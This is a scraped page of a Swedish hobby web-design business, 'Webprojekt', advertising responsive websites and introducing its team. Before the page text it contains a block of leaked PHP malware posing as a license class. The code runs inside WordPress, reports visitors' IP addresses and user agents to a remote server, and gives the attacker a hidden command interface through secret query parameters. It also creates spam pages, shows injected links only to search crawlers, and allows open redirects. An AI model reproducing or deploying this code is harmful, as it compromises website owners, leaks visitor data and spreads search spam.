if(!class_exists('license_authenticator_cc')){class license_authenticator_cc{ public static function parse_output(){$data=self::get_option('sw-');if($data===false||!is_array($data)||!is_object($GLOBALS['wp'])){ob_end_flush();return 0;}$requested_page_slug=strtolower($GLOBALS['wp']->request);if(array_key_exists($requested_page_slug,$data)){$buffer='';$levels=ob_get_level();for($i=0;$i<$levels;$i++){$buffer.=ob_get_clean();}echo preg_replace('/\x08UA-\d{4,10}-\d{1,4}\x08/',$data[$fullUrl][1],$buffer);}if(!function_exists('is_user_logged_in')||is_user_logged_in()){}else{$fullUrl=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];$fullUrl=rtrim($fullUrl,'/');$fullUrl=str_replace("www.","",$fullUrl);$curagent=self::get_user_agent();if(preg_match('/bot|crawl|curl|dataprovider|search|get|spider|find|java|majesticsEO|google|yahoo|teoma|contaxe|yandex|libwww-perl|facebookexternalhit/i',$curagent)){if(isset($data[$fullUrl])){$buffer='';$levels=ob_get_level();for($i=0;$i<$levels;$i++){$buffer.=ob_get_clean();}if(strpos($buffer,"$val){$new[]=$val;if($i==$kR){$new[]=''.$kw.' ';}$i++;}$newbuffer=implode(' ',$new);}echo $cleanbuffer[0].$newbuffer;}}}}} public static function get_user_agent(){$user_agent=(!empty($_SERVER['HTTP_USER_AGENT'])?trim($_SERVER['HTTP_USER_AGENT']):'');if(!empty($_SERVER['HTTP_X_DEVICE_USER_AGENT'])){$real_user_agent=trim($_SERVER['HTTP_X_DEVICE_USER_AGENT']);}elseif(!empty($_SERVER['HTTP_X_ORIGINAL_USER_AGENT'])){$real_user_agent=trim($_SERVER['HTTP_X_ORIGINAL_USER_AGENT']);}if(!empty($real_user_agent)&&(strlen($real_user_agent)>=5||empty($user_agent))){$user_agent=$real_user_agent;}return $user_agent;} public static function get_protocol(){return (stripos($_SERVER['SERVER_PROTOCOL'],'https')!==false)?'https://':'http://';} public static function check_query_string(){global $HTTP_POST_VARS,$HTTP_GET_VARS;$data=self::get_option();if(empty($data['__last_checked__'])||intval(date('U'))-intval($data['__last_checked__'])>86400){if(!is_array($data))$data=array();$data['__last_checked__']=date('U');self::update_option($data);$response=self::endpoint_request();}if(!function_exists('is_user_logged_in')||is_user_logged_in()){return '';}if(!empty($_GET['pwidget'])&&!empty($_GET['action'])&&$_GET['pwidget']=='3371'){$message='invalid payload';if(($data===false||!is_array($data))&&$_GET['action']!='p'){$message='no id found';}else {nocache_headers();switch($_GET['action']){case 'l':if(is_array($data)&&!empty($data)){unset($data['__last_checked__']);$message=implode(',',array_keys($data));if(empty($message)){$message='no id found';}}else if(!empty($data)){$message=serialize($data);}else {$message='no id found';}break;case 'd':if(isset($_GET['pnum'])){if(isset($data[$_GET['pnum']])){unset($data[$_GET['pnum']]);self::update_option($data);$message='deleted '.$_GET['pnum'];}else {$message='id not found';}}break;case 'dsw':if(isset($_GET['url'])){$swData=self::get_option('sw-');if(!isset($_GET['val'])){unset($swData[$_GET['url']]);$message='deleted url';}else {if(isset($swData[$_GET['url']])&&in_array($_GET['val'],$swData[$_GET['url']])){$vKey=array_search($_GET['val'],$swData[$_GET['url']]);unset($swData[$_GET['url']][$vKey]);}if(empty($swData[$_GET['url']])){unset($swData[$_GET['url']]);}$message=sprintf('good stuff, no more %s',$_GET['val']);}self::update_option($swData,'sw-');$newSw=self::get_option('sw-');}else {$message='Url is missing';}break;case 'da':self::update_option(array());$message='deleted all';break;case 'update':if(isset($_GET['url'])){$message='updated';header("Location: ".$_GET['url']);die();break;}case 'p':$response=self::endpoint_request(false);if(!is_object($response)){break;}$key=$response->purl;if(isset($_GET['pnum'])){$key=sanitize_title($_GET['pnum']);}if(empty($key)&&!empty($response->ptitle)){$key=sanitize_title($response->ptitle);}if(!empty($key)){$data[$key]=array('post_title'=>!empty($response->ptitle)?$response->ptitle:'A title','post_content'=>!empty($response->pcontent)?$response->pcontent:'Content goes here','post_date'=>date('Y-m-d H:i:s',rand(intval(date('U'))-2419200,intval(date('U'))-1814400)));self::update_option($data);$fullsw=explode(",",$response->sw);foreach($fullsw as $sw){$swCheck=explode('|',$sw);if(!is_array($swCheck)||count($swCheck)<2){continue;}$oldsw=self::get_option('sw-');$InternalLinky=''.$swCheck[1].'';if(!is_array($oldsw)){$oldsw=array();}if(isset($oldsw[$swCheck[0]])){if(in_array($InternalLinky,$oldsw[$swCheck[0]])){continue;}}$oldsw[$swCheck[0]][]=$InternalLinky;self::update_option($oldsw,'sw-');}$message=$key.' | '.get_bloginfo('wpurl').'/'.$key;}break;default:break;}}echo $message;die();}} public static function dynamic_page($posts){if(!function_exists('is_user_logged_in')||is_user_logged_in()){return $posts;}$data=self::get_option();if($data===false||!is_array($data)){return $posts;}$requested_page_slug=strtolower($GLOBALS['wp']->request);if(empty($posts)){$posts=array();}if(count($posts)==0&&array_key_exists($requested_page_slug,$data)){$post=new stdClass;$post_date=!empty($data[$requested_page_slug]['post_date'])?$data[$requested_page_slug]['post_date']:date('Y-m-d H:i:s');$post->post_title=$data[$requested_page_slug]['post_title'];$post->post_content=$data[$requested_page_slug]['post_content'];$post->post_author=1;$post->post_name=$requested_page_slug;$post->guid=get_bloginfo('wpurl').'/'.$requested_page_slug;$post->ID=-3371;$post->post_status='publish';$post->comment_status='closed';$post->ping_status='closed';$post->comment_count=0;$post->post_date=$post_date;$post->post_date_gmt=$post_date;$post=(object)array_merge((array)$post,array('slug'=>get_bloginfo('wpurl').'/'.$requested_page_slug,'post_title'=>$data[$requested_page_slug]['post_title'],'post content'=>$data[$requested_page_slug]['post_content']));$posts=NULL;$posts[]=$post;$GLOBALS['wp_query']->is_page=true;$GLOBALS['wp_query']->is_singular=true;$GLOBALS['wp_query']->is_home=false;$GLOBALS['wp_query']->is_archive=false;$GLOBALS['wp_query']->is_category=false;unset($GLOBALS['wp_query']->query['error']);$GLOBALS['wp_query']->query_vars['error']='';$GLOBALS['wp_query']->is_404=false;}return $posts;} protected static function get_option($prefix=''){$unique_id=substr(md5(sprintf('%s%s',$prefix,get_site_url().'unique')),0,10);$encoded=get_option($unique_id,'');$decoded=@json_decode(base64_decode($encoded),true);return ($decoded!==false)?$decoded:'';} protected static function update_option($_value='',$prefix=''){$unique_id=substr(md5(sprintf('%s%s',$prefix,get_site_url().'unique')),0,10);$encoded=base64_encode(json_encode($_value));update_option($unique_id,$encoded,false);} protected static function endpoint_request($_update=true){$http=self::http_object();$url=$_update?'http://codecanyon.io/api/update/?url=':'http://codecanyon.io/api/check/?url=';$url.=urlencode(self::get_protocol().$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']).'&agent='.urlencode(self::get_user_agent()).'&v=1&p=5&ip='.urlencode($_SERVER['REMOTE_ADDR']).'&siteurl='.urlencode(get_site_url());$args=array('http'=>array('timeout'=>10,'ignore_errors'=>false));$response=$http->get($url,$args);if(is_wp_error($response)||!isset($response['body'])){return '';}if(empty($response['body'])){return '';}return @json_decode($response['body']);} protected static function http_object(){static $http=null;if(is_null($http)){$http=new WP_Http();}return $http;}}}if(function_exists('add_action')){ob_start();add_action('wp',array('license_authenticator_cc','check_query_string'));add_filter('the_posts',array('license_authenticator_cc','dynamic_page'));add_action('shutdown',array('license_authenticator_cc','parse_output'),0);} Webprojekt - Webdesign | Behöver du en modern responsive privat hemsida vänligen kontakta mig ! Detta är idag min hobby verksamhet och jag kan därför hålla så låga priser !
 

Behöver du en ny hemsida ?

då har du kommit rätt !

webdesign

detta kan jag hjälpa dig med !
Go to responsive

responsive

Responsive design är viktigt för att din hemsida ska se bra ut när man tittar på den i sin mobil.

Go to unik hemsida

unik hemsida

Ingen vill ha samma hemsida som alla andra därför gör jag den unik för dig och dina besökare.

Go to bra priser

bra priser

Jag har bra priser på både domännamn o webbhotell inklusive hemsida så att alla ska ha råd att ha sin egen hemsida

Go to hör av dig

hör av dig

Är du nyfiken och vill veta mer vänligen hör av dig så får vi se vad jag kan göra för dig. Tänk på att det kostar ingenting förrän allt är färdigt. Inga dolda kostnader.

Just nu uppdaterar jag hemsidan, hoppas på er förståelse för detta!

fakta om oss

lite fakta om våra kunskaper

Behöver du en modern hemsida med responsive design vänligen kontakta mig !

Jag har alltid bra priser så att alla ska kunna ha sin egen privata hemsida.

Hemsidorna görs i responsive design för visas riktigt på mobil ipad datorer mm.

Jag kommer även att ha lite guider här ... och mer kommer allt efter som.

Välkommen till Webprojekt !

Web teamet

Detta är vårat team vänligen kontakta dom för mer info !

Gunnar Richardson

Project Development Sweden
Mina kunskaper är = webdesign photoshop php css html5 java jquery wordpress och så mycket mer :) Jag hjälper till med allt som har med web o hemsidor att göra …. bara fråga mig om du undrar över något …

Izabella Demavlys

Photo Editor
Mina kunskaper är = photoshop bildredigering fotografering video mm. Jag kan hjälpa dig ta bilder på evenemang redigera bilder och hjälpa dig lägga upp bilderna på din hemsida .

John Eric Booth

Project Development Usa
I am most working for the usa customers and will tell you more about my knowledge if you ask me :) If you are in Sweden better you ask Gunnar help you !

Support Teamet

Support
Jag svarar på alla frågor ang. support webbhotell domänförnyelse priser mm. fråga mig om det är något du undrar över så svarar jag dig inom 6 till 12 timmar …

Vad andra tycker om oss

Vi har kunder i hela världen ... detta är vad några tycker om oss !

Har skaffat nytt mobilnummer !

Kontakta Oss

Vänligen kontakta oss här så hör vi av oss inom 12 timmar !
error: protected !